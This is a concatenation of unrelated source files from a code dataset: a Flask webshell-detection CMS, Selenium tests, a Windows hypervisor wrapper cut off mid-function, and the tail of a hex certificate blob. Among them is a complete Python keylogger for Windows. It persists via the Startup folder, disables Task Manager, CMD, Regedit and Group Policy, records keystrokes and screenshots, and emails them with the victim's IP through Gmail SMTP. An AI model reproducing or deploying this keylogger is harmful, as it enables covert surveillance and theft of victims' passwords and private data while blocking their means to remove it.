'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000b81600000002020030' \
'8216a706092a864886f70d010702a082169830821694020101310b3009060' \
'52b0e03021a0500304c060a2b060104018237020104a03e303c3017060a2b' \
'06010401823702010f3009030100a004a20280003021300906052b0e03021' \
'a050004148b0b6f528a90a39758cd423dd0fd773be279d65ca08211d03082' \
'03ee30820357a00302010202107e93ebfb7cc64e59ea4b9a77d406fc3b300' \
'd06092a864886f70d010105050030818b310b3009060355040613025a4131' \
'1530130603550408130c5765737465726e204361706531143012060355040' \
'7130b44757262616e76696c6c65310f300d060355040a1306546861777465' \
'311d301b060355040b13145468617774652043657274696669636174696f6' \
'e311f301d060355040313165468617774652054696d657374616d70696e67' \
'204341301e170d3132313232313030303030305a170d32303132333032333' \
'53935395a305e310b3009060355040613025553311d301b060355040a1314' \
'53796d616e74656320436f72706f726174696f6e3130302e0603550403132' \
'753796d616e7465632054696d65205374616d70696e672053657276696365' \
'73204341202d20473230820122300d06092a864886f70d010101050003820' \
'10f003082010a0282010100b1acb349544b971c120ad825799122572a6fdc' \
'b826c443736bc2bf2e505afb14c2768e43012543b4a1e245f4e8b77bc374c' \
'<KEY>' \
'2bcb991eac721b264d711fb131ddfb51610253a6aaf5492c057845a52f89c' \
'<KEY>' \
'<KEY>' \
'af7fb747c27e6f74a1b7fa7c39e2dae8aeaa6e6aa27167d61f7987111bce2' \
'50a14be55dfae50ea72c9faa6520d3d896e8c87ca54e4844ff19e24407920' \
'bd76884805d6a786445cd60467e54c1137cc579f1c9c1710203010001a381' \
'fa3081f7301d0603551d0e041604145f9af56e5ccccc749ad4dd7def3fdbe' \
'c4c802edd303206082b0601050507010104263024302206082b0601050507' \
'30018616687474703a2f2f6f6373702e7468617774652e636f6d301206035' \
'51d130101ff040830060101ff020100303f0603551d1f043830363034a032' \
'a030862e687474703a2f2f63726c2e7468617774652e636f6d2f546861777' \
'46554696d657374616d70696e6743412e63726c30130603551d25040c300a' \
'06082b06010505070308300e0603551d0f0101ff040403020106302806035' \
'51d110421301fa41d301b311930170603550403131054696d655374616d70' \
'2d323034382d31300d06092a864886f70d01010505000381810003099b8f7' \
'9ef7f5930aaef68b5fae3091dbb4f82065d375fa6529f168dea1c9209446e' \
'f56deb587c30e8f9698d23730b126f47a9ae3911f82ab19bb01ac38eeb599' \
'600adce0c4db2d031a6085c2a7afce27a1d574ca86518e979406225966ec7' \
'c7376a8321088e41eaddd9573f1d7749872a16065ea6386a2212a35119837' \
'eb63082042830820310a003020102020b0400000000012f4ee1355c300d06' \
'092a864886f70d01010505003057310b30090603550406130242453119301' \
'7060355040a1310476c6f62616c5369676e206e762d73613110300e060355' \
'040b1307526f6f74204341311b301906035504031312476c6f62616c53696' \
'76e20526f6f74204341301e170d3131303431333130303030305a170d3139' \
'303431333130303030305a3051310b3009060355040613024245311930170' \
'60355040a1310476c6f62616c5369676e206e762d73613127302506035504' \
'03131e476c6f62616c5369676e20436f64655369676e696e67204341202d2' \
'0473230820122300d06092a864886f70d01010105000382010f003082010a' \
'0282010100b24f14e710bed72672ab3697ef53bf42845e58d18a28fc43466' \
'f7e2844500b755d00d73c0a449e206aa4f7454a3760a36e3f12fa6dfab646' \
'<KEY>' \
'a243149d5a2a9e2d391ab3e3c73eff629f1c835d0307b7f4e92a5068f87e2' \
'cef5c16366ac18692ac15ebb5ae86e95ff3b80629d99c7c72f66d5fd621a8' \
'<KEY>' \
'a974e3a50854d983353b8e8c230c75b6de864a9e1a3e0a5049389cd2a890b' \
'f98fac88c2b27117e2afbcedea9ae389322faa6ecfb5c6176c344d6cc0c7e' \
'2f6d0680a27440bbb71ff43bd773541ff30203010001a381fa3081f7300e0' \
'603551d0f0101ff04040302010630120603551d130101ff040830060101ff' \
'020100301d0603551d0e04160414086ed8b69c8abfed3ed7c3745dcc801fa' \
'82f507a30470603551d200440303e303c0604551d20003034303206082b06' \
'010505070201162668747470733a2f2f7777772e676c6f62616c7369676e2' \
'e636f6d2f7265706f7369746f72792f30330603551d1f042c302a3028a026' \
'a0248622687474703a2f2f63726c2e676c6f62616c7369676e2e6e65742f7' \
'26f6f742e63726c30130603551d25040c300a06082b06010505070303301f' \
'0603551d23041830168014607b661a450d97ca89502f7d04cd34a8fffcfd4' \
'<KEY>' \
'<KEY>' \
'226bb3b6c97e7c7ce116d6891da8d6df1534d54388c61f3c8827669be8132' \
'0b31c36cc99e200a582ff048fe7e4807aad743589473540431a9780d3b8cb' \
'070c13d7ed7bd2f2ac3e2f58f0c90dc6ba5c8be685e5d6df878d2be49951e' \
'15780891fb34c8be84adbce0c6dd18dbf3caf07bc2143c18b803ba953e211' \
'e3f60697a7f6a039e8d4af9f0282c30845eec267242b16dcb64c3128cd684' \
'4b67417cb103177809e3ada8b6962da47e80034f88f7c16b5a4615cd2c198' \
'bd8709ce52d49886072a8a4195270435edad64603b0680e24ef4af60b2524' \
'ef24308204a33082038ba00302010202100ecff438c8febf356e04d86a981' \
'b1a50300d06092a864886f70d0101050500305e310b300906035504061302' \
'5553311d301b060355040a131453796d616e74656320436f72706f7261746' \
'96f6e3130302e0603550403132753796d616e7465632054696d6520537461' \
'6d70696e67205365727669636573204341202d204732301e170d313231303' \
'1383030303030305a170d3230313232393233353935395a3062310b300906' \
'0355040613025553311d301b060355040a131453796d616e74656320436f7' \
'2706f726174696f6e313430320603550403132b53796d616e746563205469' \
'6d65205374616d70696e67205365727669636573205369676e6572202d204' \
'73430820122300d06092a864886f70d01010105000382010f003082010a02' \
'82010100a2630b3944b8bb23a74449bb0effa1f0610a5393b098dbad2c0f4' \
'ac56eff863c53550f15ce043f2bfda99696d9be61790b5bc94c8676e5e043' \
'4b2295eec22b43c19fd868b48e404fee8538b911c523f26458f015326f4e5' \
'7a1ae88a402d72a1ecd4be1dd63d51789325bb05e995aa89d28500e17ee96' \
'<KEY>' \
'3649419bd2580e1e8d222a5d0ba027aa177935b65c3ee1774bc41862adc08' \
'<KEY>' \
'5c5ea330bd2f1a31bf48bbed9b3578b3bde04a77a22b224ae2ec770c5be4e' \
'832608fb0bbda94f9908e1102872aacd0203010001a382015730820153300' \
'c0603551d130101ff0402300030160603551d250101ff040c300a06082b06' \
'010505070308300e0603551d0f0101ff040403020780307306082b0601050' \
'507010104673065302a06082b06010505073001861e687474703a2f2f7473' \
'2d6f6373702e77732e73796d616e7465632e636f6d303706082b060105050' \
'73002862b687474703a2f2f74732d6169612e77732e73796d616e7465632e' \
'636f6d2f7473732d63612d67322e636572303c0603551d1f043530333031a' \
'02fa02d862b687474703a2f2f74732d63726c2e77732e73796d616e746563' \
'2e636f6d2f7473732d63612d67322e63726c30280603551d110421301fa41' \
'd301b311930170603550403131054696d655374616d702d323034382d3230' \
'1d0603551d0e0416041446c669a30e4a141ed54cda5263173f5e36bc0de63' \
'01f0603551d230418301680145f9af56e5ccccc749ad4dd7def3fdbec4c80' \
'2edd300d06092a864886f70d01010505000382010100783bb4912a004cf08' \
'f62303778a38427076f18b2de25dca0d49403aa864e259f9a40031cddcee3' \
'79cb216806dab632b46dbff42c266333e449646d0de6c3670ef705a4356c7' \
'<KEY>' \
'0420a3aaf14bc48829910e80d111fcdd5c766e4f5e0e4546416e0db0ea389' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'cd8047530820507308203efa0030201020212112133b1a3a74c3748dc9fcf' \
'7c6e580afdaf300d06092a864886f70d01010505003051310b30090603550' \
'4061302424531193017060355040a1310476c6f62616c5369676e206e762d' \
'7361312730250603550403131e476c6f62616c5369676e20436f646553696' \
'76e696e67204341202d204732301e170d3133313030383231343233385a17' \
'0d3136303630353134303130365a30819c310b30090603550406130255533' \
'10b3009060355040813024b53310f300d060355040713064f6c6174686531' \
'183016060355040a130f506f7765722041646d696e204c4c4331143012060' \
'355040b130b446576656c6f706d656e74311830160603550403130f506f77' \
'65722041646d696e204c4c433125302306092a864886f70d0109011616737' \
'570706f727440706f77657261646d696e2e636f6d30820122300d06092a86' \
'4886f70d01010105000382010f003082010a0282010100efa9e972a69924f' \
'<KEY>' \
'ffc255a460c28f82594ecc7eebf305006815153b45ca6b26ae2f101ac5e95' \
'<KEY>' \
'<KEY>' \
'822ff973026f1f1ecee59aac179fedd0c4afedf8b2735d4ef9ccc0e3feb3f' \
'42af401762f9d5d0ce8e7478f05ef8c919e5fc7bfce0636762317f8bb3bb7' \
'23dd0f861be11e25df981fb5279a6f67bc296179856cbbd2d88ce0176367f' \
'da73242c8c56b04dc47ef4c7673e61453780560e92a28e620a12c92c98ca5' \
'e806fd4750203010001a382018b30820187300e0603551d0f0101ff040403' \
'020780304c0603551d2004453043304106092b06010401a03201323034303' \
'206082b06010505070201162668747470733a2f2f7777772e676c6f62616c' \
'7369676e2e636f6d2f7265706f7369746f72792f30090603551d130402300' \
'030130603551d25040c300a06082b06010505070303303e0603551d1f0437' \
'30353033a031a02f862d687474703a2f2f63726c2e676c6f62616c7369676' \
'e2e636f6d2f67732f6773636f64657369676e67322e63726c30818606082b' \
'06010505070101047a3078304006082b060105050730028634687474703a2' \
'f2f7365637572652e676c6f62616c7369676e2e636f6d2f6361636572742f' \
'6773636f64657369676e67322e637274303406082b0601050507300186286' \
'87474703a2f2f6f637370322e676c6f62616c7369676e2e636f6d2f677363' \
'6f64657369676e6732301d0603551d0e04160414f7480f1f0943f61895a95' \
'7e787de87c0555213a1301f0603551d23041830168014086ed8b69c8abfed' \
'3ed7c3745dcc801fa82f507a300d06092a864886f70d01010505000382010' \
'10020ed7f5d04185d39a6b50511f385ba3554a8c6f164517f2a67563c4735' \
'5d9613ffeb04ebaf33af38992c9b16502e9608bc1846a6deb4e215b140917' \
'112ae8f4902e64d852021fa653a0b4efce6458a69f2f9e1623c676a357828' \
'02ae7511bd6d51b6313ebe51af927cfac4aafc8f5a716d6a35e1cfab40557' \
'361903be1f6e420b3b4666b55bef26becc7f4c7175a17a772f9d88da4a7e9' \
'<KEY>' \
'cb226db9c99d018ec4de96552fef49eee7eea72068e98ba87bce4c4a365d0' \
'8db98003055d9f31d50ca4f87c1e83d1538d04d9de353086974bff96ade54' \
'101d6601b3b34905411003787e73182045e3082045a02010130673051310b' \
'300906035504061302424531193017060355040a1310476c6f62616c53696' \
'76e206e762d7361312730250603550403131e476c6f62616c5369676e2043' \
'6f64655369676e696e67204341202d2047320212112133b1a3a74c3748dc9' \
'fcf7c6e580afdaf300906052b0e03021a0500a081be301906092a864886f7' \
'0d010903310c060a2b060104018237020104301c060a2b060104018237020' \
'10b310e300c060a2b060104018237020115302306092a864886f70d010904' \
'3116041489bb82567db1fb85096cbd3c3c8db926a6f53cad305e060a2b060' \
'10401823702010c3150304ea02e802c0050006f0077006500720020004100' \
'64006d0069006e0020004c004c00430020005000410045007800650063a11' \
'c801a687474703a2f2f7777772e706f77657261646d696e2e636f6d20300d' \
'06092a864886f70d0101010500048201007f89049751a555829048d7409c7' \
'e03561dbc24a42c6846fb21d8688e7626ce1901e8cc8cf2b6367c6a420828' \
'<KEY>' \
'256b8b501387a02b777960feaef5262a85c120e472af35b93f2aeda47326f' \
'bb177b26bcc3a38f7c347c07576ef9a21131ae477cf3fc42f92d558309fdc' \
'8c560171473591b7db0a4c83db7d26ea7746cfed79bf720ba1d6bd2ce1793' \
'aded267d8c665abe834bfa9b17dc326e005cb3ed68d17eb70351025d45567' \
'd2c90ad1005572efce374ddf01d898672d71f941036c4af9c74475a5b1ce8' \
'ce529b0eb46dda41e93a9a8afe53148c065be8955efda466527eb3bddca18' \
'2020b3082020706092a864886f70d010906318201f8308201f40201013072' \
'305e310b3009060355040613025553311d301b060355040a131453796d616' \
'e74656320436f72706f726174696f6e3130302e0603550403132753796d61' \
'6e7465632054696d65205374616d70696e672053657276696365732043412' \
'02d20473202100ecff438c8febf356e04d86a981b1a50300906052b0e0302' \
'1a0500a05d301806092a864886f70d010903310b06092a864886f70d01070' \
'1301c06092a864886f70d010905310f170d3135303232353134333532325a' \
'302306092a864886f70d010904311604145455430ff01d5ea632e1e24ce7f' \
'<KEY>' \
'<KEY>' \
'bfdec99c62caef297e9665a0f5d4c398ebbeee14948298bee9372de956237' \
'6263c3b31e0173d428e91c307276dd57a30e5e13c9c49d7b6335a38a4c02d' \
'4d1cd9b18019e2d8bb08fa6b54882aa4b2e4040ed74e23feef64c8e9b843c' \
'af2f0fea60fdf2180604b8d51ddd50934e90766ffd0a7b9b1584e28c2bea8' \
'<KEY>' \
'<KEY>' \
'cce617fbf36732899810434ae54185141ce5495bff74e45baef3832cc5b1a' \
'fe0c65ad3200440000000000'
``` |
{
"source": "0v3rW4tch/webshell_detect_cms",
"score": 2
} |
#### File: webshell_detect_cms/apps/hooks.py
```python
from .views import bp
import config
from flask import session,g
from .models import CMSUser
@bp.before_request
def before_request():
if 'user_id' in session:
user_id = session.get('user_id')
user = CMSUser.query.get(user_id)
if user:
g.cms_user = user
```
#### File: 0v3rW4tch/webshell_detect_cms/cms_develop.py
```python
from flask import Flask
from apps import bp_app
import config
from exts import db,scheduler
from flask_wtf import CSRFProtect
from utils import detectcore
def create_app():
app = Flask(__name__)
app.register_blueprint(bp_app)
app.config.from_object(config)
db.init_app(app)
app.config.update(
{"SCHEDULER_API_ENABLED": True,
"JOBS": [{"id": "mission_1",
"func": "utils.detectcore:train_save_model",
"trigger": "interval",
"seconds": 3600*24
},{"id": "mission_2", # 任务ID
"func": "apps.views:del_upload_file", # 任务位置
"trigger": "interval", # 触发器
"seconds": 3600*11 # 时间间隔
},{"id": "mission_3", # 任务ID
"func": "utils.detectcore:do_cross_validate", # 任务位置
"trigger": "interval", # 触发器
"seconds": 3600*12 # 时间间隔
}
]},threaded=True
)
scheduler.init_app(app)
scheduler.start()
CSRFProtect(app)
return app
app = create_app()
if __name__ == '__main__':
app.run(host='0.0.0.0',threaded=True,port=8888)
```
#### File: 0v3rW4tch/webshell_detect_cms/manage.py
```python
from flask_script import Manager
from flask_migrate import Migrate,MigrateCommand
from cms_develop import create_app
from exts import db
from apps.models import CMSUser
app = create_app()
manager = Manager(app)
Migrate(app,db)
manager.add_command('db',MigrateCommand)
@manager.option('-u','--username',dest='username')
@manager.option('-p','--password',dest = 'password')
@manager.option('-e','--email',dest = 'email')
def create_cms_user(username,password,email):
user = CMSUser(username,password,email)
db.session.add(user)
db.session.commit()
print("用户增加成功")
if __name__ == '__main__':
manager.run()
``` |
{
"source": "0ver3inker/Python-Keylogger",
"score": 2
} |
#### File: 0ver3inker/Python-Keylogger/Keylogger.py
```python
import sys
import os
from os.path import expanduser
# --------------------------------------------------------
# FOR THE CHECKUPS AND USING WINDOWS COMMANDS ON SHELL
from platform import system
import ctypes
import getpass
# --------------------------------------------------------
# GETTING THE PROCESS TIME
# import datetime import time
from time import sleep as s
# ---------------------------------------------------------
# GETTING USER'S IPV6 ADDRESS
import urllib.request
# ----------------------------------------------------------
# SENDING AN EMAIL
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
import mimetypes
import email.mime.application
from email.mime.base import MIMEBase
from email import encoders
from email.mime.image import MIMEImage
# ---------------------------------------------------------
# KEYLOGGER LIBRARIES
import pynput
from pynput.keyboard import Key, Listener
import logging
# --------------------------------------------------------------
# THREADING
import threading
from threading import Thread
# --------------------------------------------------------------
# BACKDOOR LIBRARIES, CLIENT
import socket
import subprocess
# --------------------------------------------------------------
# TAKING SCREENSHOTS
import pyautogui
"""------------------------------------------------------- CHECKS -----------------------------------------------------------------"""
# ADD TO STARTUP
USER_NAME = getpass.getuser()
def AddToRegistry(file_path=""):
if file_path == "":
file_path = os.path.dirname(os.path.realpath(__file__))
bat_path = (
r"C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\Programs\\Startup"
% USER_NAME
)
with open(bat_path + "\\" + "Skype.bat", "w+") as bat_file:
bat_file.write(r'start "" %s' % file_path)
# ---------------------
class disablecheck:
# DISABLE TASK MANAGER
def task(self):
os.system(
"REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"
)
# DISABLE CMD
def cmd(self):
os.system(
"REG add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f"
)
# DISABLE REGEDIT
def regedit(self):
os.system(
'REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0'
)
# DISABLE GROUP POLICY
def grouppolicy(self):
os.system(
'REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f'
)
"""------------------------------------------------------- EXPLOITS -----------------------------------------------------------------"""
general_path = expanduser("~")
# TAKE SCREENSHOTS
def takescreenshot(screenshotpath):
screenshot_index = 0
while 1:
myScreenshot = pyautogui.screenshot()
myScreenshot.save(f"{screenshotpath}/{screenshot_index}.png")
screenshot_index += 1
s(5)
# --------------------
# GET IPV6 ADDRESS
def getip():
external_ip = urllib.request.urlopen("https://ident.me").read().decode("utf8")
return external_ip
# --------------------
# KEYLOGGER
class keylogger(Thread):
def __init__(self, path):
self.path = path
self.keylog_index = 1
self.Keys = []
def on_press(self, key):
self.KEY = pynput.keyboard.Key # --> Getting keys
if key == self.KEY.backspace:
self.Keys.append(" [Back] ")
elif key == self.KEY.tab:
self.Keys.append(" [Tab] ")
elif key == self.KEY.enter:
self.Keys.append(" [Enter] ")
elif key == self.KEY.space:
self.Keys.append(" [Space] ")
elif (
type(key) == self.KEY
): # if the character is some other type of special key #--> Checking keys here
self.Keys.append(" [" + str(key)[4:] + "] ")
else:
self.Keys.append(key)
def savefile():
file_location = self.path + f"/keylog{self.keylog_index}.txt"
with open(file_location, "w", encoding="utf-8") as f: # --> Saving Keys
for i in self.Keys:
f.write(str(i))
# DETERMINE WHEN YOU WANT THE KEYS TO SAVE TO A FILE
if len(self.Keys) >= 20:
savefile()
self.keylog_index += 1
self.Keys.clear()
def logger(self):
file_location = self.path + f"/keylog{self.keylog_index}.txt"
logging.basicConfig(
filename=(file_location), level=logging.DEBUG, format="%(message)s")
with Listener(on_press=self.on_press) as listener:
listener.join()
with open(file_location, "w", encoding="utf-8") as f:
for i in self.Keys:
f.write(str(i))
def run(self):
self.t1 = threading.Thread(target=self.logger, args=())
self.t1.start()
# --------------------
# SENDING AN EMAIL
class Email:
get_ip = getip()
def __init__(self, path):
self.email = ""
self.password = ""
self.path = path
self.msg = MIMEMultipart()
self.subject = self.msg["Subject"] = self.get_ip
self.msg["From"] = ""
self.msg["To"] = ""
self.body = ""
def addattachment(self):
for files in os.listdir(self.path):
if files.lower().endswith("txt"):
self.msg.attach(MIMEText(self.body, "plain", "utf-8"))
filename = files
attachment = open(f"{self.path}\\{files}", "rb")
p = MIMEBase("application", "octet-stream")
p.set_payload((attachment).read())
encoders.encode_base64(p)
p.add_header(
"Content-Disposition", "attachment; filename= %s" % filename
)
self.msg.attach(p)
attachment.close()
elif (files.lower().endswith("png")):
fp = open(f"{self.path}\\{files}", 'rb')
img = MIMEImage(fp.read(), _subtype="png")
fp.close()
img.add_header("Content-ID", "attachment; filename= %s" % files)
self.msg.attach(img)
else:
print("Cannot find the extension!")
def send(self):
s = smtplib.SMTP("smtp.gmail.com", 587)
s.starttls()
s.login(self.email, self.password)
s.sendmail(self.email, self.email, self.msg.as_string())
s.quit()
def run(self):
t1 = threading.Thread(target=self.addattachment)
t2 = threading.Thread(target=self.send)
t1.start()
t1.join()
t2.start()
"""------------------------------------------------------- RUNNING -----------------------------------------------------------------"""
# GET THE SYSTEM NAME
def getsystem():
return system()
# MAKE IT INFALLIABLE
if getsystem().lower() == "windows":
# DIRECTORIES
desktop_path = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')
system32_path = os.path.join(os.path.join(str(os.path.expanduser("~"))[0:3], "Windows\\System32"))
try:
exploit_path = os.mkdir(os.path.join(str(system32_path), "\\VHVybkJhY2tOb3c="))
except:
pass
exploit_path = expanduser(system32_path + "\\VHVybkJhY2tOb3c=")
ctypes.windll.kernel32.SetFileAttributesW(exploit_path, 2) # HIDING OUR DIRECTORY
# ADDING TO STARTUP
AddToRegistry()
# DISABLING REGEDIT, TASK MANAGER, GROUP POLICY AND CMD
disable = disablecheck()
disable.cmd()
disable.grouppolicy()
disable.regedit()
disable.task()
logger = keylogger(exploit_path) # KEYLOGGER OBJECT
mail = Email(exploit_path) # EMAIL OBJECT
logger.run()
threading.Thread(target=takescreenshot, args=(exploit_path,)).start()
def sendemail():
while True:
check = os.listdir(exploit_path)
count = 0
for keylogs in check:
if keylogs.startswith("keylog"):
count += 1
else:
continue
if count >= 5:
mail.run()
for check in os.listdir(exploit_path):
try:
os.remove(f"{exploit_path}\\{check}")
s(0.1)
except:
continue
else:
continue
s(5)
threading.Thread(target = sendemail).start()
``` |
{
"source": "0verchenko/learning",
"score": 3
} |
#### File: 0verchenko/learning/test_items.py
```python
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
LINK = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/"
def test_add_to_cart_button_is_displayed(browser):
browser.get(LINK)
add_to_cart_button = WebDriverWait(browser, 5).until(
EC.visibility_of_element_located((By.CSS_SELECTOR, 'form#add_to_basket_form>button')))
assert add_to_cart_button.is_displayed()
``` |
{
"source": "0verchenko/PageObject",
"score": 3
} |
#### File: PageObject/pages/login_page.py
```python
from .base_page import BasePage
from .locators import LoginPageLocators
class LoginPage(BasePage):
def should_be_login_page(self):
self.should_be_login_url()
self.should_be_login_form()
self.should_be_register_form()
def should_be_login_url(self):
assert "login" in self.browser.current_url
def should_be_login_form(self):
login_form = self.browser.find_element(*LoginPageLocators.LOGIN_FORM)
assert login_form.is_displayed()
def should_be_register_form(self):
register_form = self.browser.find_element(*LoginPageLocators.REGISTER_FORM)
assert register_form.is_displayed()
``` |
{
"source": "0vercl0k/pywinhv",
"score": 3
} |
#### File: pywinhv/pywinhv/partition.py
```python
import winhvplatform as hvplat
import pywinhv as whv
import vp
import utils
import ctypes as ct
import sys
from ctypes.wintypes import BOOL, LPVOID, DWORD, c_size_t as SIZE_T
from collections import namedtuple
ct.windll.kernel32.VirtualAlloc.argtypes = (LPVOID, SIZE_T, DWORD, DWORD)
ct.windll.kernel32.VirtualAlloc.restype = LPVOID
VirtualAlloc = ct.windll.kernel32.VirtualAlloc
ct.windll.kernel32.VirtualFree.argtypes = (LPVOID, SIZE_T, DWORD)
ct.windll.kernel32.VirtualFree.restype = BOOL
VirtualFree = ct.windll.kernel32.VirtualFree
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_READWRITE = 0x04
TranslationTableEntry_t = namedtuple(
'TranslationTableEntry_t', (
'Gva', 'Hva', 'Flags'
)
)
class WHvPartition(object):
'''This is the Python abstraction for a Partition. The class
can also be used a context manager. In this class, a lot of efforts are taken
to hide a bunch of the WinHvPlatform APIs underlying details.
On top of that, it makes invoking the raw APIs (exposed by SWIG) more pythonic.
As there are a bunch of different addresses, I have tried to follow the following
convention:
* Partition object represent a 'guest',
* The process from which you are instantiating the Partition is the 'host',
* As a result - there are always three different addresses describing the same
piece of memory:
* The address in the host virtual address-space is an HVA,
* The address in the guest virtual address-space is a GVA,
* The address in the guest physical address-space is a GPA.
'''
def __init__(self, **kwargs):
'''Create and setup a Partition object.'''
assert utils.IsHypervisorPresent(), 'The hypervisor platform APIs support must be turned on.'
self.ProcessorCount = kwargs.get('ProcessorCount', 1)
self.Name = kwargs.get('Name', 'DefaultName')
self.ExceptionExitBitmap = kwargs.get('ExceptionExitBitmap', 0)
# XXX: OrderedDict might be better?
self.TranslationTable = {}
self.Processors = []
# Create the partition.
Success, Handle, Ret = hvplat.WHvCreatePartition()
assert Success, 'WHvCreatePartition failed in context manager with %x.' % Ret
self.Handle = Handle
# Set-up the partition with a number of VPs.
Property = whv.WHV_PARTITION_PROPERTY()
Property.ProcessorCount = self.ProcessorCount
Success, Ret = hvplat.WHvSetPartitionProperty(
self.Handle,
whv.WHvPartitionPropertyCodeProcessorCount,
Property
)
assert Success, 'WHvSetPartitionProperty(ProcessorCount) failed in context manager with %x.' % Ret
# Set-up Exception exits.
Property.ExtendedVmExits.ExceptionExit = 1
Success, Ret = hvplat.WHvSetPartitionProperty(
self.Handle,
whv.WHvPartitionPropertyCodeExtendedVmExits,
Property
)
assert Success, 'WHvSetPartitionProperty(ExtendedVmExits) failed in context manager with %x.' % Ret
# Set-up the ExceptionExitBitmap.
Property.ExceptionExitBitmap = 1 << whv.WHvX64ExceptionTypeBreakpointTrap
Property.ExceptionExitBitmap |= 1 << whv.WHvX64ExceptionTypePageFault
Property.ExceptionExitBitmap |= 1 << whv.WHvX64ExceptionTypeGeneralProtectionFault
Success, Ret = hvplat.WHvSetPartitionProperty(
self.Handle,
whv.WHvPartitionPropertyCodeExceptionExitBitmap,
Property
)
assert Success, 'WHvSetPartitionProperty(ExceptionExitBitmap) failed in context manager with %x.' % Ret
# Activate the partition.
Success, Ret = hvplat.WHvSetupPartition(self.Handle)
assert Success, 'WHvSetupPartition failed in context manager with %x.' % Ret
# Create the virtual processors.
for VpIndex in range(self.ProcessorCount):
Success, Ret = hvplat.WHvCreateVirtualProcessor(
self.Handle,
VpIndex
)
assert Success, 'WHvCreateVirtualProcessor(%d) failed in context manager with %x.' % (VpIndex, Ret)
Vp = vp.WHvVirtualProcessor(
self.Handle,
self,
VpIndex
)
self.Processors.append(Vp)
@classmethod
def CreateDefault(cls, Name = 'default'):
'''Create a default partition with a single VP.'''
Partition = cls(
ProcessorCount = 1,
Name = Name,
)
return Partition
def __enter__(self):
return self
def __exit__(self, etype, value, traceback):
BlockHasThrown = etype is not None
# Release the VPs.
for Vp in self.Processors:
Success, Ret = hvplat.WHvDeleteVirtualProcessor(
self.Handle,
Vp.Index
)
assert Success, 'WHvDeleteVirtualProcessor failed in context manager with %x.' % Ret
# Release the Partition.
Success, Ret = hvplat.WHvDeletePartition(self.Handle)
assert Success, 'WHvDeletePartition failed in context manager with %x.' % Ret
# XXX: Release memory
self.TranslationTable = {}
# Forward the exception is we've intercepted one, otherwise s'all good.
return not BlockHasThrown
def __repr__(self):
'''Pretty-pinter for the Partition object.'''
return 'Partition(%r, ProcessorCount=%d)' % (
self.Name,
self.ProcessorCount
)
def GetVp(self, Index):
'''Get a VP instance.'''
assert Index < self.ProcessorCount
return self.Processors[Index]
def MapGpaRangeWithoutContent(self, Gpa, SizeInBytes, Flags):
'''Map a GPA range in the partition. This takes care of allocating
memory in the host and mapping it in the guest.'''
SizeInBytes = utils.Align2Page(SizeInBytes)
Hva = VirtualAlloc(
0,
SizeInBytes,
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE
)
assert Hva is not None, 'VirtualAlloc failed.'
if 'd' not in Flags:
# Force the 'd' dirty flag that is used for save/restore.
Flags += 'd'
WHvFlags = whv.WHvMapGpaRangeFlagNone
if 'r' in Flags:
